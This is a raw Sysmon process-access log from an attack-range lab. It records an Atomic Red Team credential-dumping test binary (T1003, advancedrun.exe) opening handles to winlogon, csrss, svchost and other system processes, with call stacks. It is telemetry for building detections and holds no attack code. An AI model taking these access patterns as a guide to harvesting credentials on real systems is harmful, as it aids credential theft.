17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943966Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943963Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 